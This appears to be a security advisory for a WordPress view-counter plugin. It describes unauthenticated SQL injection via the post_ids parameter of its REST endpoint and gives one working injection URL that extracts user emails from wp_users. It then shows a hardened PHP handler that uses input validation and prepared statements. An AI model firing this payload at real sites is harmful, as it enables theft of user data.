The plugin does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint that is available to both unauthenticated and authenticated users. As a result, unauthenticated attackers could perform SQL injection attacks.
https://example.com/?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20user_email,user_email,user_email%20from%20wp_users%20--%20g
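One way to close this class of bug in a WordPress REST handler, shown as an added example and not the plugin's own code. Only the `pvc/v1` namespace, the `increase` route and the `post_ids` parameter come from the advisory; the route pattern, HTTP method, function name, table and column names are assumptions.

```php
<?php
// Added example: hypothetical handler, not the plugin's actual code.
add_action( 'rest_api_init', function () {
    // Route pattern and method are assumed from the request shown in the advisory.
    register_rest_route( 'pvc/v1', '/increase/(?P<post_id>\d+)', array(
        'methods'             => 'GET',
        'permission_callback' => '__return_true', // endpoint stays public by design
        'callback'            => 'example_pvc_increase',
        'args'                => array(
            'post_ids' => array(
                'required'          => true,
                // Reject anything that is not a comma-separated list of digits,
                // so a value such as "0) union select ..." fails with HTTP 400
                // before any SQL is built.
                'validate_callback' => function ( $value ) {
                    return is_string( $value )
                        && 1 === preg_match( '/^\d+(,\d+)*$/', $value );
                },
                // Normalise the accepted value to an array of unique integers.
                'sanitize_callback' => function ( $value ) {
                    return wp_parse_id_list( $value );
                },
            ),
        ),
    ) );
} );

function example_pvc_increase( WP_REST_Request $request ) {
    global $wpdb;

    // Defence in depth: re-cast to integers and drop zeros even though the
    // route arguments were already validated.
    $ids = array_filter( wp_parse_id_list( $request['post_ids'] ) );
    if ( empty( $ids ) ) {
        return new WP_Error( 'invalid_post_ids',
            'post_ids must be a comma-separated list of integers.',
            array( 'status' => 400 ) );
    }

    // One %d placeholder per id; prepare() binds the values, so user input is
    // never concatenated into the statement.
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $table        = $wpdb->prefix . 'example_pvc_total'; // hypothetical table name
    $sql          = "SELECT postnum, postcount FROM {$table} WHERE postnum IN ({$placeholders})";

    return rest_ensure_response( $wpdb->get_results( $wpdb->prepare( $sql, $ids ) ) );
}
```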